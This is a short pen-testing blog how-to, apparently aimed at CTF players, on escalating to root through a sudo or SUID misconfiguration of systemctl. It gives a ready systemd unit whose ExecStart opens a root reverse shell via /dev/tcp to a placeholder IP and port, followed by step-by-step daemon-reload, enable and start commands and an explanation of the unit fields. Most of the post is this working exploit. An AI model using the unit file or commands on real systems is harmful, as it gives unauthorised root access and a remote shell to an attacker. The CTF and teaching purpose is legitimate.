How-to: systemctl Priv-Esc Exploit

Sudo or SUID Misconfigurations? Easy exploit, explained.

how-to

1. Requirements

Case 0 You have the permissions to run /bin/systemctl as sudo or the SUID bit is set. This case is the easiest to deal with.

Case 1 Permissions (at least):

  • /bin/systemctl daemon-reload
  • /bin/systemctl restart *.service

Case 2 Permissions (at least):

  • /bin/systemctl daemon-reload
  • /bin/systemctl enable *.service -> /bin/systemctl start *.service

2. Code

Case 0 and Case 1

root.service

[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'

Case 0 and Case 2

root.service

[Unit]
Description=pwn
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/your_ip/your_port 0>&1'
[Install]
WantedBy=multi-user.target

3. Exploiting

Case 0 and Case 1

  1. Edit/transfer the file root.service
  2. Run systemctl daemon-reload
  3. Run systemctl restart root.service

Case 0 and Case 2

  1. Edit/transfer the file root.service
  2. Run systemctl daemon-reload
  3. Run systemctl enable root.service
  4. Run systemctl start root.service

4. Explaination

The root.service file that we create here is a systemd.unit file, describing a service - that escalates us to root.

The Type=simple specifies that after the ExecStart=... process has been run, the unit is considered to be run successfully. The User=root specifies that we are running the above process as root. This is allowed since we are priviledged enough to run systemctl commands as root :D

NOTE: The WantedBy line is only required if you want to work with systemctl enable command. That is, tell the system to load up this specific service while booting. Confused?

Here’s the thing. When we boot up a system, all the services having a RequiredBy and WantedBy are started up. Services not having them are not started. Think about it. The services that have dependencies are resolved. Those not having this line are not started simply because they are not required or wanted by anyone else. But, we are not rebooting the system during a CTF challenge. We can start this service manually - by using the start command. Thus, there is no need of the WantedBy line!

Checkout the below error message if I do not include the [Install] instructions and use the enable command.

┌──(kali㉿kali)-[/etc/systemd/system]
└─$ sudo systemctl enable root.service
The unit files have no installation config (WantedBy=, RequiredBy=, Also=,
Alias= settings in the [Install] section, and DefaultInstance= for template
units). This means they are not meant to be enabled using systemctl.

...

Thus, only if you want to use the enable command, include the [Install] instructions. Else, its okay to skip!

5. References

Originally published at https://chaudhary1337.github.io on July 3, 2021.

Breaking in Pen-Testing